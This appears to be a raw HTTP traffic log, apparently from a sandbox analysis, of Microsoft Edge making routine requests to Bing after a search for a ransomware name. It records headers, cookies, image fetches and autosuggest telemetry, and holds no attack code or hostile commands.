cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7697
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b231
GET

https://www.bing.com/th?id=OSK.738cf5648806084c3661adb9562f297b&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.738cf5648806084c3661adb9562f297b&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 12407
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b233
GET

https://www.bing.com/th?id=OSK.7b5564edc96cec48199700dcba0786d1&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.7b5564edc96cec48199700dcba0786d1&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 2069
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcce9574bc3879b4741a02c4cc1
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-JcqGdKG/xOgC2HfOFifd2btTsw+M5vYDyXi7q7uTR7w='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:12 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b6b8
GET

https://www.bing.com/th?id=OSK.JISRChWuiBoJYjHTHiLOGUUSUwAl4T7Oo_5rRMyVgts&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.JISRChWuiBoJYjHTHiLOGUUSUwAl4T7Oo_5rRMyVgts&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b77f
GET

https://www.bing.com/th?id=OSK.8bf19c3257c7f34b54304f07b55e46fa&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.8bf19c3257c7f34b54304f07b55e46fa&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 938
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcc49954c2898896ba05830cf9a
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-griN11gf0jPj5eJrrZYuCW3InMHC64rNIlmUUPHs/tI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:12 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b7cc
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wan&cp=3&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wan&cp=3&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8809
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b96b
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22CD5043C961D9403DAF8CB01A2071EE5B%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199050539%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A19%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199050728%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199050751%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22AsResponseLength%22%3A%222166%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199050831%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%2Cig%3A33E96827282B4546B9B3227F23F71B76%22%2C%22AnswerInfo%22%3A%22MB%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199050832%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awa%2Ci%3A18%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1729199050833%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A2%2C%20%5C%22GL%5C%22%3A6%2C%20%5C%22IG%5C%22%3A%5C%2233E96827282B4546B9B3227F23F71B76%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1729199050833%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A20%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199051303%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Awan%2Ci%3A19%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199051325%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

